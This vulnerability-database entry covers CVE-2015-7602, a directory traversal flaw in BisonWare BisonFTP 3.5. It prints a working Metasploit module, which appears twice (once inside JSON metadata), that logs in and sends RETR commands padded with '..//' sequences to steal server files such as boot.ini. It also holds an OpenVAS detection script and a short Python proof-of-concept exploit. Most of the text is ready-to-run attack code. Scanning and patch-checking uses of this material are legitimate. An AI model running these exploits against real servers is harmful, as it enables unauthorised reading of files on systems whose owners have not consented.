BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
2015-11-08T05:34:10
ID MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL Type metasploit Reporter Rapid7 Modified 2020-10-02T20:00:37
Description
This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
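class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers module metadata plus the two operator options this scanner reads:
  # DEPTH (number of traversal sequences prepended) and PATH (file to retrieve).
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',
      'Description' => %q{
        This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server
        version 3.5. This vulnerability allows an attacker to download arbitrary files from the server
        by crafting a RETR command including file system traversal strings such as '..//.'
      },
      'Platform' => 'win',
      'Author' =>
        [
          'Jay Turla', # @shipcod3, msf and initial discovery
          'James Fitts',
          'Brad Wolfe <brad.wolfe[at]gmail.com>'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'EDB', '38341'],
          [ 'CVE', '2015-7602']
        ],
      'DisclosureDate' => '2015-09-28'
    ))

    register_options(
      [
        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
        OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])
      ])
  end

  # Fingerprints the FTP banner for the affected BisonFTP 3.5 build.
  #
  # @param ip [String] host being checked (unused here; the Ftp mixin connects using the datastore)
  # @return [Exploit::CheckCode] Appears when the banner matches, Safe otherwise
  def check_host(ip)
    begin
      connect
      # Regexp#=== yields false for a nil banner, so a silent server is reported as Safe.
      return Exploit::CheckCode::Appears if /BisonWare BisonFTP server product V3\.5/i === banner
    ensure
      disconnect
    end

    Exploit::CheckCode::Safe
  end

  # Logs in, opens a data channel, issues one RETR for PATH prefixed with DEPTH traversal
  # sequences, and stores whatever the server returns to loot.
  #
  # @param target_host [String] host being scanned (the Ftp mixin reads rhost/peer from the datastore)
  # @return [void]
  def run_host(target_host)
    connect_login
    sock = data_connect

    # data_connect can return nil (see #7582); with no data channel there is nothing to read,
    # so report it once and let ensure tear the control connection down.
    if sock.nil?
      error_msg = "#{__FILE__}::#{__method__}: data_connect failed; possible invalid response"
      print_status(error_msg)
      elog(error_msg)
      return
    end

    file_path = datastore['PATH']
    file = ::File.basename(file_path)

    # Build the RETR argument: DEPTH copies of the traversal sequence, then the requested path.
    retr_cmd = ("..//" * datastore['DEPTH']) + file_path
    send_cmd(["RETR", retr_cmd])

    # Only the first 1024 bytes of the data channel are read; larger files are truncated in loot.
    response_data = sock.read(1024)

    unless response_data
      print_error("#{file} not found")
      return
    end

    if response_data.empty?
      print_status("File (#{file_path})from #{peer} is empty...")
      return
    end

    loot_file = store_loot("bisonware.ftp.data", "text", rhost, response_data, file, file_path)
    vprint_status("Data returned:\n")
    vprint_line(response_data)
    print_good("Stored #{file_path} to #{loot_file}")
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout,
         ::Timeout::Error, ::Errno::EPIPE => e
    # Network-level failures are expected during a scan: log verbosely and move on.
    vprint_error(e.message)
    elog(e)
  ensure
    data_disconnect
    disconnect
  end
end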
{"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2020-10-02T20:00:37", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2020-10-07T22:01:15", "viewCount": 172, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2020-10-07T22:01:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2020-10-07T22:01:15", "rev": 2}, "vulnersScore": 5.7}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => '2015-09-28'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(e)\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(e)\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2020-10-03T12:49:55", "description": "Directory traversal vulnerability in BisonWare BisonFTP 3.5 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in a RETR command.", "edition": 3, "cvss3": {}, "published": "2015-09-29T19:59:00", "title": "CVE-2015-7602", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7602"], "modified": "2015-10-13T16:52:00", "cpe": ["cpe:/a:bisonware:bisonftp:3.5"], "id": "CVE-2015-7602", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7602", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:bisonware:bisonftp:3.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:36:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7602"], "description": "This host is running BisonWare BisonFTP Server\n and is prone to directory traversal vulnerability.", "modified": "2019-02-07T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310805753", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805753", "type": "openvas", "title": "BisonWare BisonFTP Server Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bisonware_bisonftp_server_dir_trav_vuln.nasl 13517 2019-02-07 07:51:12Z mmartin $\n#\n# BisonWare BisonFTP Server Directory Traversal Vulnerability\n#\n# Authors:\n# Deependra Bapna 
<bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bisonware:bison_ftp_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805753\");\n script_version(\"$Revision: 13517 $\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-07 08:51:12 +0100 (Thu, 07 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 12:41:58 +0530 (Tue, 29 Sep 2015)\");\n script_cve_id(\"CVE-2015-7602\");\n script_name(\"BisonWare BisonFTP Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running BisonWare BisonFTP Server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted directory traversal attack\n request and check whether it is able to read the system file or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in handling of\n file names. 
It does not properly sanitise filenames containing directory traversal\n sequences that are received from an FTP server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to read arbitrary files on the affected application.\");\n\n script_tag(name:\"affected\", value:\"BisonWare BisonFTP Server version 3.5.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/38341\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"FTP\");\n script_dependencies(\"gb_bisonware_bisonftp_server_detect.nasl\");\n script_mandatory_keys(\"BisonWare/Ftp/Installed\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nftpPort = get_app_port(cpe:CPE);\nif(!ftpPort){\n exit(0);\n}\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc){\n exit(0);\n}\n\nkb_creds = ftp_get_kb_creds();\nuser = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nlogin_details = ftp_log_in(socket:soc, user:user, pass:pass);\nif(!login_details)\n{\n close(soc);\n exit(0);\n}\n\nftpPort2 = ftp_get_pasv_port(socket:soc);\nif(!ftpPort2)\n{\n close(soc);\n exit(0);\n}\n\nsoc2 = open_sock_tcp(ftpPort2, transport:get_port_transport(ftpPort));\nif(!soc2)\n{\n close(soc);\n exit(0);\n}\n\nfiles = traversal_files( \"Windows\" );\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n file = \"../../../\" + file;\n req = string(\"RETR \", 
file);\n send(socket:soc, data:string(req, \"\\r\\n\"));\n\n res = ftp_recv_data(socket:soc2);\n\n if( res && match = egrep( string:res, pattern:\"(\" + pattern + \"|\\WINDOWS)\", icase:TRUE ) ) {\n report = \"Used request: \" + req + '\\n';\n report += \"Received data: \" + match;\n security_message(port:ftpPort, data:report);\n close(soc2);\n close(soc);\n exit(0);\n }\n}\n\nclose(soc);\nclose(soc2);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T07:52:44", "description": "BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability. CVE-2015-7602. Remote exploit for windows platform", "published": "2015-09-28T00:00:00", "type": "exploitdb", "title": "BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7602"], "modified": "2015-09-28T00:00:00", "id": "EDB-ID:38341", "href": "https://www.exploit-db.com/exploits/38341/", "sourceData": "#!/usr/bin/python\r\n# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability\r\n# author: Jay Turla <@shipcod3>\r\n# tested on Windows XP Service Pack 3 - English\r\n# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar\r\n# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC) \r\n\r\nfrom ftplib import FTP\r\n\r\nftp = FTP(raw_input(\"Target IP: \")) \r\nftp.login() \r\nftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)\r\nftp.close()\r\nfile = open('boot.ini.txt', 'r')\r\nprint \"[**] Printing what's inside boot.ini\\n\"\r\nprint \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\r\nprint file.read()\r\nprint \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/38341/"}]}